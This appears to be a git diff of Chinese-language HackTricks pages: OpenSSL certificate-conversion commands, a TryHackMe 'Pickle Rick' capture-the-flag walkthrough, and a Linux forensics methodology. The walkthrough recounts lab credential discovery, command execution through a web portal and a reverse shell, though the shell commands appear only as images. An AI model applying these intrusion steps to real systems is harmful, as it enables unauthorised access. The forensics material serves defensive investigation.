通过执行上述步骤您可以将PEM格式证书转换为PKCS8格式以便在需要的情况下使用。
**2- 将 PEM 转换为 PKCS8**
```
openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8
```
**将P7B转换为PFX**\
**注意:**这需要2个命令
**将 P7B 转换为 PFX**\
**注意:** 这需要2个命令
1- **将P7B转换为CER**
1- **将 P7B 转换为 CER**
```
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
```
**2- 将CER证书和私钥转换为PFX格式**
To convert a CER certificate and its corresponding private key to PFX format, you can use the OpenSSL command-line tool. PFX (Personal Information Exchange) is a file format used to store a private key, certificate, and any intermediate certificates in a single encrypted file.
Here are the steps to convert the CER and private key to PFX:
1. Make sure you have OpenSSL installed on your system. If not, download and install it.
2. Open a command prompt or terminal and navigate to the directory where the CER and private key files are located.
3. Run the following command to convert the CER and private key to PFX:
```
openssl pkcs12 -export -out certificate.pfx -inkey privatekey.key -in certificate.cer
```
Replace `privatekey.key` with the filename of your private key file and `certificate.cer` with the filename of your CER certificate file. The resulting PFX file will be named `certificate.pfx`.
4. You will be prompted to enter a password for the PFX file. Choose a strong password and remember it, as you will need it to access the private key and certificate later.
5. Once the command completes successfully, you will have a PFX file containing the private key, certificate, and any intermediate certificates.
Remember to securely store the PFX file, as it contains sensitive information.
**2- 将 CER 和私钥转换为 PFX**
```
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
```
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球**最先进**的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>从零开始学习AWS黑客攻击</strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者你想要访问**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**hacktricks repo**](https://github.com/carlospolop/hacktricks)和[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)提交PR来**分享你的黑客技巧**。
其他支持HackTricks的方式
* 如果您希望在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧。
</details>

56
ctf-write-ups/try-hack-me/pickle-rick.md
View file

@ -4,55 +4,57 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一个**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果你想在 **HackTricks中看到你的公司广告** 或者 **下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现 [**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。**
</details>
![](../../.gitbook/assets/picklerick.gif)
这台机器被归类为简单,而且很容易
这台机器被归类为简单,而且确实很简单
## 枚举
我开始使用我的工具[**Legion**](https://github.com/carlospolop/legion)对机器进行枚举
我开始使用我的工具 [**Legion**](https://github.com/carlospolop/legion) **枚举这台机器**
![](<../../.gitbook/assets/image (79) (2).png>)
如你所见有2个端口是开放的80**HTTP**和22**SSH**
如你所见有2个端口开放80 (**HTTP**) 和 22 (**SSH**)
所以我启动了Legion来枚举HTTP服务
因此我启动了legion来枚举HTTP服务
![](<../../.gitbook/assets/image (234).png>)
请注意,在图像中你可以看到`robots.txt`包含字符串`Wubbalubbadubdub`
注意,在图片中你可以看到 `robots.txt` 包含字符串 `Wubbalubbadubdub`
几秒钟后,我查看了`disearch`已经发现的内容:
几秒钟后,我回顾了 `disearch` 已经发现的内容:
![](<../../.gitbook/assets/image (235).png>)
![](<../../.gitbook/assets/image (236).png>)
正如你在最后一张图片中看到的,发现了一个**登录**页面。
正如你在最后一张图片中看到的,一个**登录**页面被发现了
检查根页面的源代码,发现了一个用户名:`R1ckRul3s`
![](<../../.gitbook/assets/image (237) (1).png>)
因此,你可以使用凭据`R1ckRul3s:Wubbalubbadubdub`登录登录页面
因此,你可以使用凭据 `R1ckRul3s:Wubbalubbadubdub`登录页面登录
## 用户
使用这些凭据,你将进入一个可以执行命令的门户:
使用这些凭据,你将访问一个可以执行命令的门户:
![](<../../.gitbook/assets/image (241).png>)
一些命令如cat是不允许的但你可以使用grep来读取第一个配料flag
一些命令如cat是不允许的但你可以使用例如grep来读取第一个成分标志
![](<../../.gitbook/assets/image (242).png>)
@ -60,28 +62,30 @@
![](<../../.gitbook/assets/image (243) (1).png>)
来获一个反向shell
来获一个反向shell
![](<../../.gitbook/assets/image (239) (1).png>)
**第二个配料**可以在`/home/rick`中找到
**第二个成分**可以在 `/home/rick` 中找到
![](<../../.gitbook/assets/image (240).png>)
## Root
##
用户**www-data可以以sudo的方式执行任何命令**
用户 **www-data可以作为sudo执行任何操作**
![](<../../.gitbook/assets/image (238).png>)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一个**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果你想在 **HackTricks中看到你的公司广告** 或者 **下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现 [**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。**
</details>

856
exploiting/linux-exploiting-basic-esp/README.md
View file

File diff suppressed because it is too large Load diff

388
forensics/basic-forensic-methodology/linux-forensics.md
View file

@ -1,21 +1,24 @@
# Linux取证
# Linux 取证
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。\
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客攻击直到成为专家,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
其他支持 HackTricks 的方式:
* 如果你想在 HackTricks 中看到你的**公司广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享你的黑客技巧。
</details>
@ -23,12 +26,12 @@
### 基本信息
首先,建议准备一些**带有已知良好的二进制文件和库的USB设备**可以只获取ubuntu并复制文件夹_/bin_ _/sbin_ _/lib_和_/lib64_然后挂载USB设备,并修改环境变量以使用这些二进制文件:
首先,建议携带一个**USB**,里面有**已知良好的二进制文件和库**(你可以直接获取 ubuntu 并复制 _/bin_、_/sbin_、_/lib_ 和 _/lib64_ 文件夹),然后挂载 USB,并修改环境变量以使用这些二进制文件:
```bash
export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
```
一旦您配置系统使用良好且已知的二进制文件,您可以开始提取一些基本信息:
一旦您配置系统使用良好且已知的二进制文件,您可以开始**提取一些基本信息**
```bash
date #Date and time (Clock may be skewed, Might be at a different timezone)
uname -a #OS info
@ -48,47 +51,45 @@ find /directory -type f -mtime -1 -print #Find modified files during the last mi
```
#### 可疑信息
在获取基本信息时,您应该检查以下异常情况
在获取基本信息时,你应该检查一些异常情况,比如
* **Root进程**通常以较低的PID运行因此如果您发现一个具有较大PID的Root进程可能存在可疑情况
* 检查`/etc/passwd`中没有shell的用户的**注册登录**
* 检查`/etc/shadow`中没有shell的用户的**密码哈希**
* **Root 进程** 通常具有较低的 PIDS因此如果你发现一个具有较大 PID 的 root 进程,你可能会怀疑
* 检查 `/etc/passwd` 中没有 shell 的用户的**注册登录**
* 检查 `/etc/shadow` 中没有 shell 的用户的**密码哈希**
### 内存转储
为了获取正在运行的系统的内存,建议使用[**LiME**](https://github.com/504ensicsLabs/LiME)。
要进行**编译**,您需要使用与受害机器使用的**相同内核**。
要获取正在运行的系统的内存,建议使用 [**LiME**](https://github.com/504ensicsLabs/LiME)。\
要**编译**它,你需要使用受害机器正在使用的**相同内核**。
{% hint style="info" %}
请记住,您**不能在受害机器上安装LiME或任何其他东西**,因为这将对其进行多个更改。
记住,你**不能在受害机器上安装 LiME 或任何其他东西**,因为这会对其进行多次更改
{% endhint %}
因此如果您有一个相同版本的Ubuntu可以使用`apt-get install lime-forensics-dkms`。
在其他情况下您需要从GitHub下载[**LiME**](https://github.com/504ensicsLabs/LiME),并使用正确的内核头文件进行编译。要**获取受害机器的确切内核头文件**,您只需将目录`/lib/modules/<kernel version>`复制到您的机器上,然后使用它们来**编译**LiME
因此,如果你有一个相同版本的 Ubuntu你可以使用 `apt-get install lime-forensics-dkms`\
在其他情况下,你需要从 github 下载 [**LiME**](https://github.com/504ensicsLabs/LiME),并使用正确的内核头文件进行编译。要**获取受害机器的确切内核头文件**,你可以简单地**复制目录** `/lib/modules/<kernel version>` 到你的机器,然后使用它们**编译** LiME
```bash
make -C /lib/modules/<kernel version>/build M=$PWD
sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
```
LiME支持3种格式
LiME支持3种**格式**
* 原始格式(将每个段连接在一起)
* 填充格式(与原始格式相同,但右侧位填充为零
* Lime格式推荐的带有元数据的格式)
* Raw每个段连续拼接在一起)
* Padded与raw相同但右侧位用零填充
* Lime带有元数据的推荐格式)
LiME还可以用于通过网络发送转储,而不是将其存储在系统上,使用类似`path=tcp:4444`
LiME还可以用来**通过网络发送转储**,而不是将其存储在系统上,使用类似:`path=tcp:4444`
### 磁盘
### 磁盘
#### 关闭系统
#### 关
首先,您需要**关闭系统**。这并不总是一个选择,因为有时系统将是一台公司无法承受关闭的生产服务器。\
两种关闭系统的方式,一种是**正常关闭**,另一种是**“拔插头”关闭**。第一种方式将允许**进程正常终止**和**文件系统同步**,但也会允许可能的**恶意软件破坏证据**。拔插头的方法可能会导致**一些信息丢失**(由于我们已经对内存进行了镜像,所以不会丢失太多信息),而**恶意软件将没有任何机会**对此做任何事情。因此,如果您**怀疑可能存在恶意软件**,只需在系统上执行**`sync`**命令,然后拔掉插头
首先,你需要**关闭系统**。这并不总是一个选项,因为有时系统会是公司无法承受关闭的生产服务器。\
**两种**关闭系统的方法,一种是**正常关机**,另一种是**"拔插头"关机**。前者将允许**进程正常终止**和**文件系统**被**同步**,但它也会允许可能的**恶意软件**来**销毁证据**。"拔插头"方法可能会带来**一些信息丢失**(不会丢失太多信息,因为我们已经取得了内存的镜像),并且**恶意软件将没有任何机会**做任何事情。因此,如果你**怀疑**可能有**恶意软件**,只需在系统上执行**`sync`** **命令**然后拔掉电源
#### 获取磁盘镜像
重要的是要注意,在**将您的计算机连接到与案件相关的任何内容之前**,您需要确保它将以**只读方式挂载**,以避免修改任何信息。
重要的是要注意,在**连接你的计算机到任何与案件相关的东西之前**,你需要确保它将被**以只读方式挂载**,以避免修改任何信息。
```bash
#Create a raw copy of the disk
dd if=<subject device> of=<image file> bs=512
@ -97,9 +98,9 @@ dd if=<subject device> of=<image file> bs=512
dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file>
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
```
### 磁盘像预分析
### 磁盘像预分析
没有更多数据的磁盘镜像进行镜像制作
一个没有更多数据的磁盘映像进行成像
```bash
#Find out if it's a disk image using "file" command
file disk.img
@ -152,18 +153,19 @@ r/r 16: secret.txt
icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 来轻松构建并**自动化工作流程**,这些工作流程由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 搜索已知恶意软件
### 修改的系统文件
### 修改的系统文件
一些Linux系统具有验证许多已安装组件完整性的功能这是一种有效的方法来识别异常或不合适的文件。例如在Linux上`rpm -Va`旨在验证使用RedHat软件包管理器安装的所有软件包。
一些 Linux 系统具有**验证许多已安装组件的完整性**的功能这提供了一种有效的方法来识别不寻常或不合适的文件。例如Linux 上的 `rpm -Va` 旨在验证使用 RedHat 包管理器安装的所有包。
```bash
#RedHat
rpm -Va
@ -171,9 +173,9 @@ rpm -Va
dpkg --verify
debsums | grep -v "OK$" #apt-get install debsums
```
### 恶意软件/Rootkit 检测工具
### 恶意软件/Rootkit 检测
阅读以下页面,了解可以用于查找恶意软件的工具:
阅读以下页面以了解有助于发现恶意软件的工具:
{% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md)
@ -181,10 +183,10 @@ debsums | grep -v "OK$" #apt-get install debsums
## 搜索已安装的程序
### 软件包管理器
### 包管理器
在基于 Debian 的系统中_**/var/lib/dpkg/status**_ 文件包含有关已安装软件包的详细信息,而 _**/var/log/dpkg.log**_ 文件记录了软件包安装时的信息。\
RedHat 和相关的 Linux 发行版中,**`rpm -qa --root=/mntpath/var/lib/rpm`** 命令将列出系统上 RPM 数据库的内容。
在基于Debian的系统中_**/var/lib/dpkg/status**_ 文件包含已安装包的详细信息,而 _**/var/log/dpkg.log**_ 文件记录了包安装时的信息。\
RedHat及相关Linux发行版中,**`rpm -qa --root=/mntpath/var/lib/rpm`** 命令将列出系统上RPM数据库的内容。
```bash
#Debian
cat /var/lib/dpkg/status | grep -E "Package:|Status:"
@ -194,11 +196,11 @@ rpm -qa --root=/ mntpath/var/lib/rpm
```
### 其他
**并非所有已安装的程序都会在上述命令中列出**,因为某些应用程序在某些系统上不可用作为软件包,必须从源代码安装。因此,检查诸如 _**/usr/local**__**/opt**_ 等位置可能会发现其他已从源代码编译和安装的应用程序。
**并非所有已安装的程序都会通过上述命令列出**,因为某些应用程序对于特定系统来说并不提供包形式,必须从源代码安装。因此,检查像 _**/usr/local**__**/opt**_ 这样的位置可能会发现其他已经从源代码编译并安装的应用程序。
```bash
ls /opt /usr/local
```
另一个好主意是**检查**$PATH中的**常见文件夹**,查找与**已安装软件包无关的二进制文件**
另一个好主意是**检查**位于**$PATH**中的**常见文件夹**,寻找与**已安装包无关的二进制文件:**
```bash
#Both lines are going to print the executables in /sbin non related to installed packages
#Debian
@ -206,20 +208,23 @@ find /sbin/ -exec dpkg -S {} \; | grep "no path found"
#RedHat
find /sbin/ exec rpm -qf {} \; | grep "is not"
```
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
```markdown
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和自动化由全球**最先进**的社区工具提供支持的工作流程。\
\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 来轻松构建并**自动化工作流程**,这些工作流程由世界上**最先进**的社区工具提供支持。
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 恢复已删除的运行二进制文件
## 恢复已删除的运行二进制文件
![](<../../.gitbook/assets/image (641).png>)
## 检查自启动位置
### 计划任务
```
```bash
cat /var/spool/cron/crontabs/* \
/var/spool/cron/atjobs \
@ -235,7 +240,7 @@ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Libra
```
### 服务
恶意软件通常会作为新的未授权服务嵌入系统。Linux有一些脚本用于在计算机启动时启动服务。初始化启动脚本 _**/etc/inittab**_ 调用其他脚本,如 rc.sysinit 和 _**/etc/rc.d/**_ 目录下的各种启动脚本,或者在一些旧版本中是 _**/etc/rc.boot/**_。在其他版本的Linux中如Debian启动脚本存储在 _**/etc/init.d/**_ 目录中。此外,一些常见服务在 _**/etc/inetd.conf**__**/etc/xinetd/**_ 中启用具体取决于Linux的版本。数字取证人员应检查每个启动脚本中是否存在异常条目。
恶意软件通常会将自己伪装成一个新的、未经授权的服务。Linux有许多脚本用于在计算机启动时启动服务。初始化启动脚本 _**/etc/inittab**_ 会调用其他脚本如rc.sysinit以及位于 _**/etc/rc.d/**_ 目录下的各种启动脚本,或在某些较旧版本中的 _**/etc/rc.boot/**_。在其他版本的Linux中如Debian启动脚本存储在 _**/etc/init.d/**_ 目录中。此外,一些常见服务在 _**/etc/inetd.conf**__**/etc/xinetd/**_ 中启用具体取决于Linux的版本。数字调查员应检查这些启动脚本中的异常条目。
* _**/etc/inittab**_
* _**/etc/rc.d/**_
@ -248,50 +253,50 @@ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Libra
### 内核模块
在Linux系统上内核模块通常用作恶意软件包的rootkit组件。内核模块是根据 `/lib/modules/'uname -r'``/etc/modprobe.d` 目录中的配置信息以及 `/etc/modprobe``/etc/modprobe.conf` 文件在系统启动时加载的。应检查这些区域是否存在与恶意软件相关的项目。
在Linux系统上内核模块通常用作恶意软件包的rootkit组件。根据 `/lib/modules/'uname -r'``/etc/modprobe.d` 目录中的配置信息以及 `/etc/modprobe``/etc/modprobe.conf` 文件,内核模块在系统启动时加载。应检查这些区域是否有与恶意软件相关的项目。
### 其他自启动位置
Linux使用几个配置文件在用户登录系统时自动启动可执行文件这些文件可能包含恶意软件的痕迹。
Linux使用几个配置文件在用户登录系统时自动启动可执行文件,这些文件可能包含恶意软件的痕迹。
* _**/etc/profile.d/\***_ , _**/etc/profile**_ , _**/etc/bash.bashrc**_ 在任何用户账户登录时执行。
* _**/.bashrc**_ , _**/.bash\_profile**_ , _**\~/.profile**_ , _**/.config/autostart**_ 在特定用户登录时执行。
* _**/etc/rc.local**_ 传统上在所有正常系统服务启动后执行,在切换到多用户运行级别的过程结束时。
* _**/etc/profile.d/\***_ _**/etc/profile**_ _**/etc/bash.bashrc**_ 在任何用户账户登录时执行。
* _**/.bashrc**_ _**/.bash\_profile**_ _**\~/.profile**_ _**/.config/autostart**_ 在特定用户登录时执行。
* _**/etc/rc.local**_ 传统上在所有正常系统服务启动后执行,在切换到多用户运行级别的过程结束时执行
## 检查日志
在受损系统上查找所有可用的日志文件,以寻找恶意执行和相关活动的痕迹,例如创建新服务。
检查受损系统上所有可用的日志文件,寻找恶意执行的痕迹和相关活动,如创建新服务。
### 纯日志
记录在系统和安全日志中的**登录**事件,包括通过网络登录,可以揭示**恶意软件**或**入侵者**在特定时间通过给定账户访问受损系统的情况。系统日志中可以捕获与恶意软件感染相关的其他事件,包括在事件发生时创建新服务或新账户。\
有趣的系统登录日志
**登录** 事件记录在系统和安全日志中,包括通过网络的登录,可以揭示 **恶意软件****入侵者通过特定账户在特定时间获得了对受损系统的访问**。恶意软件感染时的其他事件也可以在系统日志中捕获,包括在事件发生时创建的 **新** **服务** 或新账户。\
值得关注的系统登录
* **/var/log/syslog** (debian) 或 **/var/log/messages** (Redhat)
* 显示系统的一般消息和信息。这是全局系统活动的数据日志。
* 显示系统的一般消息和信息。它是全局系统所有活动的数据日志。
* **/var/log/auth.log** (debian) 或 **/var/log/secure** (Redhat)
* 保存成功或失败的登录和认证过程的认证日志。存储位置取决于系统类型。
* 保存成功或失败的登录和认证过程的认证日志。存储取决于系统类型。
* `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"`
* **/var/log/boot.log**:启动消息和引导信息。
* **/var/log/maillog** 或 **var/log/mail.log**:用于邮件服务器日志,方便查看在服务器上运行的 postfix、smtpd 或与电子邮件相关的服务信息。
* **/var/log/kern.log**:保存内核日志和警告信息。内核活动日志(例如 dmesg、kern.log、klog可以显示特定服务的重复崩溃,可能表明安装了不稳定的木马版本。
* **/var/log/dmesg**:设备驱动程序消息的存储库。使用 **dmesg** 命令查看此文件中的消息。
* **/var/log/faillog**:记录失败的登录信息。因此,用于检查潜在的安全漏洞,如登录凭据被盗和暴力破解攻击
* **/var/log/cron**:记录与 Crond 相关的消息cron 作业。例如cron 守护程序启动作业的时间
* **/var/log/daemon.log**:跟踪运行的后台服务,但不以图形方式表示。
* **/var/log/boot.log**:启动消息和启动信息。
* **/var/log/maillog** 或 **var/log/mail.log**:用于邮件服务器日志,适用于在服务器上运行的postfix、smtpd或与邮件相关的服务信息。
* **/var/log/kern.log**:保存内核日志和警告信息。内核活动日志(例如dmesg、kern.log、klog可以显示某个服务反复崩溃,可能表明安装了不稳定的木马版本。
* **/var/log/dmesg**:设备驱动消息的存储库。使用 **dmesg** 查看此文件中的消息。
* **/var/log/faillog**:记录失败登录的信息。因此,对于检查潜在的安全漏洞,如登录凭证被黑和暴力攻击,非常有用
